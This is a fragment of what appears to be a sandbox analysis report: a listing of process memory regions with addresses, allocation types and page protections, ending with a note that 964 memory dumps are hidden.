page read and write
|
||
80000
|
heap
|
page read and write
|
||
70000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
26D000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
2AB0000
|
trusted library allocation
|
page read and write
|
||
21810000
|
trusted library allocation
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
5FDD000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
67C0000
|
heap
|
page read and write
|
||
1B6000
|
heap
|
page read and write
|
||
14E000
|
heap
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
4A03000
|
heap
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
4D39000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1A770000
|
heap
|
page read and write
|
||
2979000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
11E000
|
heap
|
page read and write
|
||
4CDD000
|
heap
|
page read and write
|
||
398000
|
heap
|
page read and write
|
||
21E80000
|
heap
|
page read and write
|
||
4B07000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
216F0000
|
trusted library allocation
|
page read and write
|
||
49AD000
|
heap
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
8B7000
|
heap
|
page read and write
|
||
250000
|
direct allocation
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
33C0000
|
direct allocation
|
page read and write
|
||
90C000
|
heap
|
page read and write
|
||
12A000
|
heap
|
page read and write
|
||
30D000
|
heap
|
page read and write
|
||
373C000
|
heap
|
page read and write
|
||
1CFB000
|
direct allocation
|
page read and write
|
||
4CF7000
|
heap
|
page read and write
|
||
2437E000
|
stack
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
2984000
|
trusted library allocation
|
page read and write
|
||
22FB000
|
heap
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
2C40000
|
trusted library allocation
|
page read and write
|
||
4D1F000
|
heap
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
662D000
|
heap
|
page read and write
|
||
1AF94000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
372F000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1C10D000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
F1000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
230000
|
direct allocation
|
page read and write
|
||
1B6000
|
heap
|
page read and write
|
||
2983000
|
trusted library allocation
|
page read and write
|
||
2540000
|
trusted library allocation
|
page read and write
|
||
6610000
|
heap
|
page read and write
|
||
144000
|
heap
|
page read and write
|
||
2A8000
|
heap
|
page read and write
|
||
1BF20000
|
heap
|
page read and write
|
There are 964 hidden memdumps, click here to show them.